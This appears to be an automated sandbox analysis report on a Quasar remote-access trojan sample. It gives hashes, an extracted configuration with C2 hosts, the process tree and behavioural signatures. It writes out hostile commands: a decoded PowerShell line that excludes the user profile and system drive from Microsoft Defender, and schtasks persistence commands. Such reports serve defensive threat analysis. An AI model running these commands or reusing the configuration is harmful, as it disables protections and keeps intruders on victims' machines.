Analysis
max time kernel: 137s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/01/2023, 14:25
Static task: static1
Behavioral task: behavioral1
Sample: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Resource: win7-20220812-en
General
Target: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Size: 354KB
MD5: 8b54bcaf180119658155a1ba2909f082
SHA1: 7813044ffe233a79eb5937e6affcfbc365427fc1
SHA256: 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
SHA512: fb9f1fe603c69a27c1fbf40067be9ef3273a791a40e8f262d98e2c16dcd1c6ecc36f359f1a8119532a078e0ba8f4065dc2ef44a1282d9b2f41578551ab8f6fd8
SSDEEP: 6144:XbRHhzisehcChBB6aQaAIybtbJpHgxwkeDBWeSXpU+PtL11J//LbwDJQHgYCBfuB:Xb/Shzn4tbPAGkeLatL11J//LUDaAY2C
Malware Config
Extracted
Family: quasar
Version: 1.3.0.0
Botnet: Office04
C2: 192.168.0.125:4782
C2: AeroNaut-25032.portmap.io:25032
Mutex: QSR_MUTEX_e22Aj87Wn2XuKgDxxw
encryption_key: s8zrhKuw28Jjzjqpd6lo
install_name: Java.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: JavaStartup
subdirectory: SubDir
Signatures

Quasar payload (5 IoCs)
resource | yara_rule
behavioral2/files/0x0001000000022df7-145.dat | family_quasar
behavioral2/files/0x0001000000022df7-146.dat | family_quasar
behavioral2/memory/2116-147-0x00000000009B0000-0x0000000000A0E000-memory.dmp | family_quasar
behavioral2/files/0x0003000000022df9-155.dat | family_quasar
behavioral2/files/0x0003000000022df9-156.dat | family_quasar
Executes dropped EXE (2 IoCs)
pid | Process
2116 | Client-built.exe
4056 | Java.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
14 | ip-api.com
Drops file in Program Files directory (4 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | Java.exe
File opened for modification | C:\Program Files (x86)\SubDir | Java.exe
File created | C:\Program Files (x86)\SubDir\Java.exe | Client-built.exe
File opened for modification | C:\Program Files (x86)\SubDir\Java.exe | Client-built.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4308 | schtasks.exe
2984 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid | Process
4024 | powershell.exe
4024 | powershell.exe
2408 | powershell.exe
2408 | powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4024 | powershell.exe
Token: SeDebugPrivilege | 2408 | powershell.exe
Token: SeDebugPrivilege | 2116 | Client-built.exe
Token: SeDebugPrivilege | 4056 | Java.exe
Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
4056 | Java.exe
Suspicious use of WriteProcessMemory (18 IoCs; each parent-to-child write is logged three times, the six unique entries are listed once)
description | pid | Process | procid_target
PID 848 wrote to memory of 4024 | 848 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 82
PID 848 wrote to memory of 2408 | 848 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 84
PID 848 wrote to memory of 2116 | 848 | 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe | 86
PID 2116 wrote to memory of 4308 | 2116 | Client-built.exe | 87
PID 2116 wrote to memory of 4056 | 2116 | Client-built.exe | 89
PID 4056 wrote to memory of 2984 | 4056 | Java.exe | 90
Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"
  PID: 848
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    PID: 4024
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="
    (the UTF-16LE base64 above decodes to: <#ufs#>Add-MpPreference <#vic#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uiw#> -Force <#txk#>, i.e. the user profile and the whole system drive are added to the Microsoft Defender exclusion list, with junk block comments inserted between the tokens)
    PID: 2408
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\Client-built.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
    PID: 2116
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\schtasks.exe
      command line: "schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f
      PID: 4308
      - Creates scheduled task(s)

    C:\Program Files (x86)\SubDir\Java.exe
      command line: "C:\Program Files (x86)\SubDir\Java.exe"
      PID: 4056
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\schtasks.exe
        command line: "schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f
        PID: 2984
        - Creates scheduled task(s)
Downloads

Filesize: 348KB
MD5: c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1: 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256: 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512: 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf
Filesize: 1KB
MD5: 4cc9e7069534f7bcbb90ad7cac69ed78
SHA1: a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA256: 4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512: e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Filesize: 18KB
MD5: ba4f16a3fe5704136d34f3c9fa04d896
SHA1: 5d2d6a763b61c5338583194d869171a7af14bafc
SHA256: 7f684196a3f6e786bed918870e0c3c84575991224b138b93a327de9ed249a03c
SHA512: eccf2335489ea553201eec9c74149fba004adf1e450912a5e73a75bd713d8fb9b3bde2f84a15d0b2e296cfb2feacc10bb3e9c37d3b87bf95c5371aff29ddb0d0